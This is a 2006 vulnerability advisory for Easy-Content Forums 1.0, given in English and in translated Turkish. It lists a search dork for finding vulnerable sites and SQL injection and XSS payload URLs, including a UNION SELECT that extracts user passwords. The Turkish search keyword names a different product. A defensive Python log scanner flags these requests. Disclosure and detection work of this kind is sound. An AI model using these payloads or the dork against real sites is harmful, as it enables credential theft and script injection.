Easy-Content Forums 1.0 Multiple [SQL/XSS] Vulnerabilities

2006-05-31 / 2006-06-01
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79

ENGLISH

# Title  : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork   : "Copyright 2004 easy-content forums"
# Author : ajann
# Exploit;

SQL INJECTION--------------------------------------------------------

### http://[target]/[path]/userview.asp?startletter=SQL TEXT
### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x

Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

### http://[target]/[path]/userview.asp?startletter=xss TEXT
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT

Example:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X

# ajann,Turkey

TURKISH (translated)

# Title            : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Keyword [Search] : "powered by phpmydirectory"
# Discovered by    : ajann
# Vulnerable files;

SQL INJECTION--------------------------------------------------------

### http://[target]/[path]/userview.asp?startletter=YOUR SQL QUERY
### http://[target]/[path]/topics.asp?catid=1'YOUR SQL QUERY =>catid=variable

Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

### http://[target]/[path]/userview.asp?startletter=YOUR XSS CODE
### http://[target]/[path]/topics.asp?catid=30&forumname=YOUR XSS CODE

Example:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E
This displays an X alert on the screen.

Explanation:
Because input filtering is missing in userview.asp and topics.asp, SQL queries can be executed.
Because input filtering is missing in userview.asp and topics.asp, XSS code can be executed.

# ajann,Turkey
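For defenders reviewing web server logs, the following added example (not part of the original advisory or the Easy-Content code) flags requests to the two affected pages whose `startletter`, `catid` or `forumname` values fall outside an expected shape. The simplified log format, the `/forum/` path, the client addresses and the allowed value shapes are all assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters named in the advisory. The allowed value shapes are ASSUMPTIONS
# about normal use; the advisory does not document legitimate values.
RULES = {
    ("userview.asp", "startletter"): re.compile(r"[A-Za-z0-9]?"),
    ("topics.asp", "catid"): re.compile(r"\d{1,9}"),
    ("topics.asp", "forumname"): re.compile(r"[^<>\"']{0,100}"),
}

# Constructed sample lines: "<date> <time> <client-ip> <method> <uri>"
SAMPLE_LOG = [
    "2006-06-01 10:00:01 192.0.2.10 GET /forum/topics.asp?catid=30&forumname=General",
    "2006-06-01 10:00:05 198.51.100.7 GET /forum/topics.asp?catid=1%20union+select"
    "+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users",
    "2006-06-01 10:00:09 198.51.100.7 GET /forum/topics.asp?catid=30&forumname="
    "%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E",
    "2006-06-01 10:00:12 192.0.2.10 GET /forum/userview.asp?startletter=A",
]

def check_request(uri):
    """Return (page, param, decoded_value) for each parameter violating RULES."""
    parts = urlsplit(uri)
    page = parts.path.rsplit("/", 1)[-1].lower()
    findings = []
    # parse_qs percent-decodes values and turns '+' into a space.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        rule = RULES.get((page, name.lower()))
        for value in values if rule else ():
            if not rule.fullmatch(value):
                findings.append((page, name.lower(), value))
    return findings

def scan_log(lines):
    """Return (client_ip, page, param, value) for every flagged request."""
    flagged = []
    for line in lines:
        fields = line.split(" ", 4)
        if len(fields) != 5:
            continue  # skip malformed lines
        client_ip, uri = fields[2], fields[4]
        flagged += [(client_ip, *f) for f in check_request(uri)]
    return flagged

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same allow-list shapes can be enforced server-side before the values reach a query or the response body, which addresses the missing filtering the advisory describes.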



Copyright 2017, cxsecurity.com

 
